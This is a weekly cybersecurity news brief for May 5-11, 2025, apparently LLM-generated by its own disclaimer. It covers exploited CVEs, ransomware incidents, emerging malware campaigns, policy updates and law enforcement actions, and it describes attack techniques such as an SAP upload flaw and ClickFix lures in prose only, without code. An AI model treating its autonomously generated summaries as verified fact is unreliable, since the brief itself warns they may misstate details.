May 11, 2025

Cybersec Feeds Overview, May 5 - May 11, 2025

This brief consolidates key updates from 80+ sources, including government organizations, cybersecurity vendors, threat intelligence teams, security research labs, and blogs from cybersecurity communities and professionals. It highlights the most significant threats, vulnerabilities, and developments from the past week to keep you informed.

Most Discussed Topics

  • The role of Artificial Intelligence (AI) in cybersecurity is a dominant theme, with discussions spanning its use in offensive tactics like generating deepfakes and enhancing phishing, to defensive applications such as AI-powered threat detection, automated forensics, and scam prevention in browsers. Concerns also arise about AI-generated misinformation, the security of AI models themselves (like DeepSeek), and the challenges of ‘AI slop’ in bug bounty programs. The industry is exploring AI agents for various tasks, including red teaming and security operations, while also grappling with the ethical implications and the need for robust AI governance and security practices.
  • Ransomware continues to be a significant threat, with multiple strains like LockBit, Play, Akira, Nitrogen, and Mamona actively targeting organizations. High-profile incidents impacted UK retailers, healthcare (Ascension), and technology companies (Hitachi Vantara), leading to operational disruptions and data leaks. Reports highlight the prevalence of the Ransomware-as-a-Service (RaaS) model, threat actors exploiting zero-day vulnerabilities for privilege escalation (e.g., Play ransomware using CVE-2025-29824), and the concerning trend of re-extortion even after ransoms are paid, as seen with PowerSchool customers.
  • Vulnerabilities in Industrial Control Systems (ICS) and Operational Technology (OT) are frequently highlighted, with CISA releasing multiple advisories for products from Horner Automation, Hitachi Energy, Mitsubishi Electric, Optigo Networks, Milesight, and BrightSign. These vulnerabilities often allow for remote code execution, denial-of-service, or privilege escalation. Additionally, CISA warns about unsophisticated actors targeting ICS/SCADA systems in critical infrastructure sectors like Energy and Transportation, emphasizing the need for basic cyber hygiene and mitigation strategies to prevent significant operational disruptions or physical damage.
  • The CISA Known Exploited Vulnerabilities (KEV) catalog is regularly updated, indicating ongoing active exploitation of specific CVEs. Recently added vulnerabilities include OS command injection flaws in GeoVision Devices (CVE-2024-6047, CVE-2024-11120), a FreeType out-of-bounds write vulnerability (CVE-2025-27363), a Langflow missing authentication vulnerability (CVE-2025-3248), and two SonicWall SMA 100 series vulnerabilities (CVE-2023-44221, CVE-2024-38475). Federal Civilian Executive Branch (FCEB) agencies are mandated by BOD 22-01 to remediate these vulnerabilities by specified due dates, and CISA strongly urges all organizations to prioritize these patches.

Critical Vulnerabilities

  • Multiple vulnerabilities in SonicWall Secure Mobile Access (SMA) 100 series appliances, including CVE-2023-44221 (OS command injection) and CVE-2024-38475 (Apache mod_rewrite improper output escaping), are actively exploited and can be chained for remote code execution. CISA added these to the KEV catalog. Separately, Rapid7 disclosed CVE-2025-32819 (arbitrary file delete, root), CVE-2025-32820 (path traversal, directory writable), and CVE-2025-32821 (shell command injection) also in SMA 100 series, which can lead to root RCE when chained. SonicWall has released patches.
  • SAP NetWeaver Visual Composer (version 7.50) is affected by CVE-2025-31324, a critical (CVSS 10.0) unauthenticated file upload vulnerability. This allows remote code execution and full system compromise by sending crafted HTTP requests to the /developmentserver/metadatauploader endpoint. Attackers have been observed deploying web shells like helper.jsp and cache.jsp. Forescout linked recent exploitation activity to a Chinese threat actor (Chaya_004) using Chinese-language tools and infrastructure.
  • CISA added several actively exploited vulnerabilities to its KEV catalog. These include GeoVision Devices OS Command Injection vulnerabilities CVE-2024-6047 and CVE-2024-11120. Langflow is affected by CVE-2025-3248, a missing authentication vulnerability. FreeType has an out-of-bounds write vulnerability, CVE-2025-27363, which Google confirmed is under limited, targeted exploitation and impacts Android. Organizations are urged to patch these flaws promptly.
  • Multiple vulnerabilities affect Industrial Control Systems (ICS). Pixmeo OsiriX MD (medical imaging software) has Use After Free (CVE-2025-27578, CVE-2025-31946) and Cleartext Transmission of Sensitive Information (CVE-2025-27720) vulnerabilities, leading to DoS or credential theft. Horner Automation Cscape (control system software) has an Out-of-bounds Read flaw (CVE-2025-4098) allowing information disclosure and RCE. Hitachi Energy RTU500 series devices are vulnerable to XSS (CVE-2023-5767, CVE-2023-5769) and DoS (CVE-2023-5768).
  • Additional ICS vulnerabilities disclosed by CISA include: Mitsubishi Electric CC-Link IE TSN products (CVE-2025-3511) which can suffer a DoS via crafted UDP packets. Optigo Networks ONS NC600 (CVE-2025-4041) contains hard-coded SSH credentials allowing OS command execution. BrightSign Players (CVE-2025-3925) have an unnecessary privileges flaw leading to privilege escalation. Milesight UG65-868M-EA industrial gateway (CVE-2025-4043) has an improper access control flaw allowing admin users to inject shell commands via /etc/rc.local.
  • A Windows privilege escalation zero-day (CVE-2025-29824) in the Common Log File System Driver (clfs.sys) was exploited by attackers linked to the Play ransomware prior to its patch on April 8, 2025. The attackers deployed the Grixba infostealer, a tool associated with the Balloonfly group (Play ransomware operators). Initial access may have been via a public-facing Cisco ASA firewall. This highlights the risk of zero-days being used in ransomware campaigns for privilege escalation.
  • Several vulnerabilities have been identified in Microsoft Azure services and related products. Azure is affected by CVE-2025-33072 (Information Disclosure in msagsfeedback.azurewebsites.net), CVE-2025-29972 (Spoofing in Storage Resource Provider via SSRF), and CVE-2025-29827 (Elevation of Privilege in Azure Automation). Azure DevOps has an EoP flaw (CVE-2025-29813) where pipeline job tokens are improperly handled. Microsoft Power Apps has an SSRF information disclosure vulnerability (CVE-2025-47733), and Microsoft Dataverse is vulnerable to RCE (CVE-2025-47732). Additionally, a use-after-free in Chromium WebAudio (CVE-2025-4372) affects Microsoft Edge.

Major Incidents

  • Several major UK retailers, including Co-op, Harrods, and Marks & Spencer (M&S), experienced significant cyberattacks disrupting operations and compromising sensitive data. These attacks are suspected to be linked to the Scattered Spider gang, with the DragonForce ransomware group also claiming responsibility. The incidents have prompted the NCSC to issue recommendations, particularly focusing on IT helpdesk impersonation tactics used by attackers.
  • Ascension, a major US non-profit healthcare system, disclosed a data breach affecting over 430,000 patients, stemming from a third-party hacking incident in December 2024 potentially linked to the Cl0p ransomware exploiting a Cleo software vulnerability. Exposed data includes PHI and PII like SSNs. This follows a previous Black Basta ransomware attack on Ascension in May 2024 which impacted 5.6 million individuals and was initiated by an employee downloading a malicious file.
  • PowerSchool, an education technology vendor, suffered a ransomware attack in December 2024 and paid a ransom. However, attackers are now re-extorting PowerSchool’s customers, including the Toronto District School Board (TDSB) and at least three other school boards, by threatening to leak data stolen in the original breach. The initial breach exposed data of millions of students and teachers. The ShinyHunters group is reportedly linked to these attacks.
  • The LockBit ransomware group reportedly suffered a breach of its dark web infrastructure. An attacker defaced LockBit’s affiliate panels and leaked a MySQL database dump containing nearly 60,000 Bitcoin addresses used for ransom payments, negotiation chats with victims from December 2024 to April 2025, custom ransomware builds, and affiliate/admin credentials in plaintext. This follows previous law enforcement actions against the group.
  • Hitachi Vantara, a subsidiary of Hitachi, was targeted by the Akira ransomware gang. The attackers allegedly stole files from the company’s network and left ransom notes on compromised machines, leading to disruption of some systems. This incident adds to the growing list of enterprises falling victim to Akira ransomware operations.
  • The ByBit cryptocurrency exchange suffered a massive hack in February 2025, resulting in the theft of approximately $1.46 billion (around 400,000 ETH). The attack is attributed to North Korea’s TraderTraitor (Lazarus Group). A significant portion of the stolen funds, estimated at over $200 million, was reportedly laundered through the eXch cryptocurrency mixer, which has since been shut down by German authorities.
  • The student engagement platform iClicker’s website was compromised between April 12-16, 2025, in a ClickFix attack. Attackers used a fake CAPTCHA prompt to trick students and instructors into copying and executing malicious PowerShell scripts. This allowed threat actors to gain full access to infected devices, likely deploying infostealers to capture credentials, cookies, and other sensitive data. The specific malware payload varied based on the visitor.

Emerging Threats

  • Unsophisticated cyber actors are increasingly targeting Industrial Control Systems (ICS) and SCADA systems within U.S. critical infrastructure, particularly in Energy and Transportation. CISA notes that while these actors often use basic intrusion techniques, poor cyber hygiene and exposed assets can escalate these threats, leading to significant consequences like defacement, operational disruptions, or physical damage. Organizations are urged to implement primary mitigations for OT environments.
  • A new .NET malware obfuscation technique involves hiding malicious payloads, such as Agent Tesla or XLoader, within bitmap resources embedded in benign-looking 32-bit .NET applications. This steganographic approach initiates a multi-stage chain to extract, deobfuscate, load, and execute secondary DLL payloads, ultimately detonating the final malware. This method was observed in malspam campaigns targeting financial and logistics sectors, often using procurement-themed lures.
  • The Inferno Drainer, a sophisticated Drainer-as-a-Service crypto scam, remains operational despite an announced shutdown in late 2023. Recent campaigns show technical upgrades and infrastructure improvements, including using single-use smart contracts, on-chain encrypted configurations, and proxy-based communication to bypass wallet security and anti-phishing measures. A recent campaign abused Discord, redirecting users from a legitimate Web3 site to a fake bot and then a phishing site to sign malicious transactions, victimizing over 30,000 wallets and causing at least $9 million in losses in the last six months.
  • A new infostealer malware named Noodlophile is being distributed through fake AI-powered video generation tools advertised on Facebook. Victims are lured by promises of free AI video generation, but instead download a ZIP archive containing the Noodlophile Stealer. This malware, linked to Vietnamese-speaking operators and sold on dark web forums, targets browser credentials, cookies, tokens, and cryptocurrency wallets, exfiltrating data via Telegram. It may also bundle XWorm RAT for enhanced data theft.
  • Threat actors are leveraging Facebook ads and impersonating well-known cryptocurrency exchanges (like Binance, TradingView) and celebrities to distribute malware. This multi-stage campaign uses cleverly disguised front-end scripts and custom payloads. Users are lured to fake exchange websites to download a ‘desktop client,’ which is malware that establishes a local .NET-based server for C2 communication, eventually executing PowerShell scripts to download further malware. Advanced anti-sandbox checks and targeted ad delivery are used.
  • A suspected Iranian espionage operation, possibly linked to Agent Serpens (APT35/Charming Kitten), is impersonating a German model agency. The fraudulent website mimics the real agency’s branding and hosts obfuscated JavaScript to collect visitor data, including browser details, IP addresses, and screen resolution, likely for selective targeting. The site features a fake model profile with an inactive link to a private album, suggesting preparations for targeted social engineering attacks, potentially initiated via spear phishing.
  • The Lampion banking malware is being distributed in a new campaign targeting Portuguese organizations, especially in government, finance, and transportation sectors. This campaign utilizes the ClickFix social engineering technique, where victims are lured by fake error messages or prompts to copy and execute malicious PowerShell commands to supposedly fix issues. The attack chain involves multiple highly obfuscated Visual Basic (VB) scripts and exhibits similarities to previous Lampion activity in terms of C2 infrastructure and TTPs.

Regulatory and Policy Updates

  • The UK’s National Cyber Security Centre (NCSC) and the Department for Science, Innovation and Technology have published a new voluntary ‘Software Security Code of Practice’. This code sets out expectations for the security and resilience of software, accompanied by implementation guidance from the NCSC. This initiative aims to improve software security standards among developers and organizations.
  • The UK government is advancing its move away from traditional passwords, with the NCSC announcing plans to roll out passkey technology across government digital services as an alternative to SMS-based verification. The NCSC has also joined the FIDO alliance, signaling a strong commitment to adopting more secure authentication methods. This aligns with broader efforts to enhance cybersecurity for public services.
  • A new Cyber Security Certification Scheme has been announced by IASME and the UK Ministry of Defence to improve resilience throughout the UK Defence supply chain. This scheme introduces a comprehensive cybersecurity framework for defence suppliers, aiming to enhance security and future prosperity. This reflects a growing emphasis on securing supply chains within critical sectors.
  • CISA’s Known Exploited Vulnerabilities (KEV) Catalog, established under Binding Operational Directive (BOD) 22-01, mandates Federal Civilian Executive Branch (FCEB) agencies to remediate listed vulnerabilities by specific due dates. While this directive applies to FCEB agencies, CISA strongly urges all organizations to prioritize timely remediation of these actively exploited vulnerabilities as part of their standard vulnerability management practices to reduce cyberattack exposure.
  • The PCI DSS 4.0.1 standard is now the sole reference for all companies handling payment card data, effective April 2025. This updated version mandates requirements previously considered best practices, including extended multi-factor authentication (MFA) for all non-console access to card data environments, enhanced password policies (e.g., 12-character minimum), continuous monitoring of payment pages, and maintaining a software bill of materials (SBOM). This evolution aims to address modern technologies and emerging risks in the payment ecosystem.
  • The European Commission is establishing a Health Cybersecurity Advisory Board as part of the European Action Plan on the Cybersecurity of Hospitals and Healthcare Providers. This board, co-led by ENISA, aims to facilitate public-private cooperation and advise on impactful actions to enhance cybersecurity in the EU healthcare sector. Applications for board membership are now open to qualifying individuals and Health-ISAC members.
  • A bipartisan US Senate bill proposes to ban federal contractors from using the Chinese-made Large Language Model (LLM) DeepSeek for any activity related to federal contracts. Citing national security concerns about sensitive federal data potentially being accessed by the Chinese government, the bill also mandates a Commerce Department report on threats posed by AI platforms from countries of concern. This reflects growing legislative efforts to scrutinize and restrict foreign AI technologies in government use.

Security Operations

  • Google Chrome is introducing an on-device AI feature using the Gemini Nano LLM to detect and block tech support scams, starting with Chrome 137. This local analysis allows Chrome to identify suspicious page behaviors characteristic of scams, like keyboard lock API usage, and send signals to Safe Browsing for a final verdict, triggering a warning if malicious intent is confirmed. This aims to provide real-time protection against short-lived malicious sites while preserving performance and privacy, initially for Enhanced Protection users.
  • Cisco XDR is integrating automated forensics into its detection and response workflow. This new capability aims to capture forensic evidence (memory, processes, file data) automatically upon detection of suspicious events. The collected artifacts will enrich incident timelines, and AI-powered summarization will interpret findings and suggest root causes and response actions, streamlining investigations and reducing reliance on manual DFIR processes.
  • The UK NCSC is launching new assurance initiatives to enhance cyber resilience. These include establishing an ecosystem of assured Cyber Resilience Test Facilities for vendors to demonstrate product resilience and a Cyber Adversary Simulation scheme, set to launch in summer, to help organizations test their defenses. Additionally, NCSC is piloting an Assured Cyber Security Consultancy for post-quantum cryptography (PQC) to ensure competent advice and build market capacity for PQC migration.
  • Microsoft is enhancing security in Teams by introducing a feature to block screen captures during meetings. If a user attempts a screen capture, the meeting window will turn black to protect sensitive information. This feature is planned for rollout in July 2025 for Teams desktop (Windows, Mac) and mobile (iOS, Android) applications. Users on unsupported platforms may be placed in audio-only mode.
  • Exposure management is presented as an evolution of traditional vulnerability management, aiming to unify disparate security data and provide a holistic view of an organization’s risk landscape. This approach helps contextualize vulnerabilities with other exposures like misconfigurations and identity risks, enabling better prioritization and more efficient remediation. Platforms supporting exposure management should offer broad integrations to ingest data from various security tools, breaking down operational silos.
  • Health-ISAC is actively promoting cybersecurity best practices and collaboration, particularly for resource-constrained organizations like small and rural hospitals. They offer resources such as white papers on AI and digital identity for CISOs, and events like the Americas Hobby Exercise to foster public-private partnerships. The emphasis is on maintaining software updates, regular backups, and adopting robust security measures to safeguard patient data and safety, especially with the rise of remote monitoring technologies.
  • The curl project is experiencing a deluge of low-quality, AI-generated vulnerability reports, particularly from platforms like HackerOne. Founder Daniel Stenberg stated they are effectively being DDoSed by “AI slop” and will now ask reporters to verify if AI was used, potentially banning those submitting such reports. This highlights a growing problem where AI tools generate voluminous but often invalid security findings, wasting open-source maintainers’ time.

Wins

  • An international law enforcement operation involving the U.S. DOJ, Netherlands, and Thailand, has dismantled the Anyproxy and 5socks botnets. These services, operational for over 20 years, infected thousands of end-of-life wireless routers worldwide, selling access to them as residential proxies for illicit activities and allegedly amassing over $46 million. Four foreign nationals (three Russian, one Kazakhstani) have been indicted for their roles in operating these botnets.
  • German authorities, including the BKA and Frankfurt’s Public Prosecutor’s Office, have shut down the eXch cryptocurrency mixing platform. The operation involved seizing its German server infrastructure, over 8 terabytes of data, and crypto assets worth approximately $38.2 million. eXch was allegedly used to launder significant amounts of illicit funds, including over $200 million from the $1.46 billion ByBit hack attributed to North Korea’s Lazarus Group.
  • WhatsApp, owned by Meta, won a significant legal victory against Israeli spyware vendor NSO Group. A U.S. federal jury ordered NSO Group to pay nearly $168 million in damages ($167.3M punitive, $444k compensatory) for using its Pegasus spyware to infect approximately 1,400 WhatsApp users in 2019. This ruling is seen as a critical deterrent to the spyware industry and a win for digital privacy.
  • Operation PowerOFF, a multinational law enforcement effort supported by Europol, has led to the seizure of six DDoS-for-hire (booter/stresser) service websites: Cfxapi, Cfxsecurity, neostress, jetstress, quickdown, and zapcut. Four administrators were arrested in Poland. This operation is part of a larger initiative to disrupt the infrastructure underpinning DDoS-for-hire markets, with U.S. authorities also seizing nine additional domains linked to similar services.

Disclaimer

The summaries in this brief are generated autonomously by a LLM model based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.

This document is created by BlackStork and is based on the template available on GitHub.

Reach out if you have questions or suggestions.